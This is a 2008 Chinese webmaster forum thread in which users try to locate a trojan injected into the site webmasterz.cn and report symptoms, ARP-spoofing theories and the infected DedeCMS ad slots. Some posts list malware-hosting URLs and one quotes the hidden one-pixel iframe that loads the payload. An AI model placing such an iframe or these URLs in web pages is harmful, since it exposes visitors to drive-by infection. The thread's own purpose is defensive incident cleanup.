webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?

[复制链接]
查看: 2959   回复: 38
发表于 2008-1-9 13:35:38 | 显示全部楼层 |阅读模式
有没高手指点下?
发表于 2008-1-9 13:47:29 | 显示全部楼层
我也不知道哪里被挂
回复 支持 反对

使用道具 举报

发表于 2008-1-9 13:59:09 | 显示全部楼层
晕,连静水的站都能被挂马呀,这个人可真是厉害!
回复 支持 反对

使用道具 举报

发表于 2008-1-9 14:21:51 | 显示全部楼层
请挂马的主动告诉站长马挂哪了,怎么挂的。
回复 支持 反对

使用道具 举报

发表于 2008-1-9 14:22:44 | 显示全部楼层
webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?
原帖由 le19754 于 2008-1-9 14:21 发表 webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?
请挂马的主动告诉站长马挂哪了,怎么挂的。
回复 支持 反对

使用道具 举报

发表于 2008-1-9 14:25:42 | 显示全部楼层
我估计是他系统中毒了,他系统内核被病毒改了~

[ 本帖最后由 上帝 于 2008-1-9 14:26 编辑 ]
回复 支持 反对

使用道具 举报

发表于 2008-1-9 14:59:53 | 显示全部楼层
论坛有没有被挂马?webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?
回复 支持 反对

使用道具 举报

发表于 2008-1-9 15:07:56 | 显示全部楼层
一上去卡巴就乱叫
回复 支持 反对

使用道具 举报

发表于 2008-1-9 15:11:33 | 显示全部楼层
webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?
回复 支持 反对

使用道具 举报

发表于 2008-1-9 15:17:00 | 显示全部楼层
原帖由 le19754 于 2008-1-9 14:21 发表 webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?
请挂马的主动告诉站长马挂哪了,怎么挂的。



webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?:
回复 支持 反对

使用道具 举报

发表于 2008-1-9 15:18:39 | 显示全部楼层
我也查不到
回复 支持 反对

使用道具 举报

发表于 2008-1-9 15:32:03 | 显示全部楼层
我上去没见卡芭报警啊,怎么回事
回复 支持 反对

使用道具 举报

发表于 2008-1-9 16:25:03 | 显示全部楼层
愤怒

[ 本帖最后由 happy61 于 2008-1-9 16:30 编辑 ]
回复 支持 反对

使用道具 举报

发表于 2008-1-9 16:33:32 | 显示全部楼层
没装REAL就没事,好在我重新装的系统webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?:
回复 支持 反对

使用道具 举报

发表于 2008-1-9 16:46:18 | 显示全部楼层
我说怎么我一上去就死机了,我挂马的先人:mad:
回复 支持 反对

使用道具 举报

发表于 2008-1-9 17:41:28 | 显示全部楼层
不用查了,多半是ARP~~机器什么时候搬国内了?

不是你服务器原因,机房网络环境问题
回复 支持 反对

使用道具 举报

发表于 2008-1-9 18:18:19 | 显示全部楼层
找到挂马证据,报给网监,让挂马者坐牢。
回复 支持 反对

使用道具 举报

发表于 2008-1-9 19:37:58 | 显示全部楼层
真的有哦,是特洛伊木马.害我不敢进去学习了.是在篇关于新手的贴子,因为我就是个新手,点的都是教新手的文章.  
回复 支持 反对

使用道具 举报

发表于 2008-1-9 20:04:44 | 显示全部楼层
好像一切正常啊,---
回复 支持 反对

使用道具 举报

发表于 2008-1-9 21:21:06 | 显示全部楼层
webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到? 怪不得一上去就慢得要命啊
回复 支持 反对

使用道具 举报

发表于 2008-1-9 21:39:03 | 显示全部楼层
..不信邪....跑上去一看...嗷嗷卡的说....
回复 支持 反对

使用道具 举报

发表于 2008-1-10 00:09:56 | 显示全部楼层
没有的事情...
回复 支持 反对

使用道具 举报

发表于 2008-1-10 09:28:26 | 显示全部楼层
贵网出现的这种arp攻击,会影响一些网速,他的模式是这样的:按照常理,服务器出外网应该走网关出去,但是由于机房内有人中了arp病毒,进行arp攻击以后,他就会劫持网关,即把自己虚拟成网关的mac,然后,贵网的服务器这时就不会从网关出去,而是通过那台中毒的机器,然后再通过网关出去
回复 支持 反对

使用道具 举报

发表于 2008-1-10 09:30:46 | 显示全部楼层
个人比较喜欢用antiarp
http://www.antiarp.com/download.htm
回复 支持 反对

使用道具 举报

发表于 2008-1-10 10:31:09 | 显示全部楼层
唉,几天没上了.
我那天上去第一次发现有毒  .. 过了个把小时 我想去看看到底哪被挂了马.看了代码没有.
发现卡巴没有报了.   
不过页面嗷嗷的卡.
偶也不知原因.
用微点查
貌似多了个服务.
c:/windows/temp/****.exe
不知各位有没有这个现像.
我的系统是当天刚装好的.
回复 支持 反对

使用道具 举报

发表于 2008-1-10 11:32:25 | 显示全部楼层
没有这种情况啊
回复 支持 反对

使用道具 举报

发表于 2008-1-10 12:24:32 | 显示全部楼层
http://www.985676.cn/encrypt/mm.htm
http://ppp.749571.com/dm/rr.htm
http://ppp.749571.com/dm/rl.htm

这是我抓到的几个,还有几个没有记下来
我冒着机器中毒的危险记下来的~

[ 本帖最后由 上帝 于 2008-1-10 12:26 编辑 ]

评分

参与人数 1 +5 收起 理由
le19754 + 5 原创内容

查看全部评分

回复 支持 反对

使用道具 举报

发表于 2008-1-10 12:28:28 | 显示全部楼层
原帖由 上帝 于 2008-1-10 12:24 发表 webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?
http://www.985676.cn/encrypt/mm.htm
http://ppp.749571.com/dm/rr.htm
http://ppp.749571.com/dm/rl.htm

这是我抓到的几个,还有几个没有记下来
我冒着机器中毒的危险记下来的~


干掉耶稣,我就是上帝!
你还有什么好怕的。
回复 支持 反对

使用道具 举报

发表于 2008-1-10 16:35:24 | 显示全部楼层
楼上的,谢谢咯~~~
回复 支持 反对

使用道具 举报

发表于 2008-1-10 16:47:23 | 显示全部楼层
进dede后台
检查 ad_js.php?aid=1  
ad_js.php?aid=2
ad_js.php?aid=3
ad_js.php?aid=4

这几个广告 里面的代码
在这几个 掉茅厕位 里面   含有 木马的 代码
回复 支持 反对

使用道具 举报

发表于 2008-1-10 16:50:35 | 显示全部楼层
请老大仔细的查查吧,刚又发现了几个,全是免杀的~~一个劲的往外蹦,但是我的卡卡即不报~~
http://ppp.749571.com/dm/test.htm
http://www.985676.cn/encrypt/mm.htm
这两个是免杀的,还有几个没记下来,
这挂马的兔崽子有一手,隐藏的很好啊~~一般人都看不出来~
回复 支持 反对

使用道具 举报

发表于 2008-1-10 17:01:37 | 显示全部楼层
会在C盘下产生 CRESS1.EXE
然后增加IE的BHO的木马 还释放驱动
回复 支持 反对

使用道具 举报

发表于 2008-1-10 17:34:02 | 显示全部楼层
昏 他藏得好隐秘  找到了 放毒得地方了

iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
然后再这个地址转到ppp.749571.co m/dm/test.htm
为了跟踪这个病毒 自己失误的。。。。哎。修复中ing。。。。
静水赶快清理了吧
回复 支持 反对

使用道具 举报

发表于 2008-1-10 18:00:24 | 显示全部楼层
原帖由 20082008 于 2008-1-9 16:33 发表 webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?
没装REAL就没事,好在我重新装的系统webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?:

说的没错
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-1-11 02:27:32 | 显示全部楼层
原帖由 freelzyr 于 2008-1-10 16:47 发表 webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?
进dede后台
检查 ad_js.php?aid=1  
ad_js.php?aid=2
ad_js.php?aid=3
ad_js.php?aid=4

这几个广告 里面的代码
在这几个 掉茅厕位 里面   含有 木马的 代码


这个检查了没有的
回复 支持 反对

使用道具 举报

发表于 2008-1-11 09:09:11 | 显示全部楼层
原帖由 静水流深 于 2008-1-11 02:27 发表 webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?


这个检查了没有的



我看过了,有挂马的代码,代码已经在你的另一个贴子里贴出来了
回复 支持 反对

使用道具 举报

发表于 2008-1-11 12:44:57 | 显示全部楼层
原帖由 静水流深 于 2008-1-11 02:27 发表 webmasterz.cn上的挂马挂在哪了 我怎么查了半天查不到?


这个检查了没有的

木马就是在这里里啊
在后台的掉茅厕位设置那
回复 支持 反对

使用道具 举报

发表于 2008-1-30 10:38:22 | 显示全部楼层
现在明了.
有人收流量做ppp.749571.co m的..
最近被挂马的话. 都改成js了. 不用iframe了
回复 支持 反对

使用道具 举报

发表于 2008-1-30 11:53:15 | 显示全部楼层
菜鸟,怕怕,不敢看,啥时好了说一声,我再去看风景
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则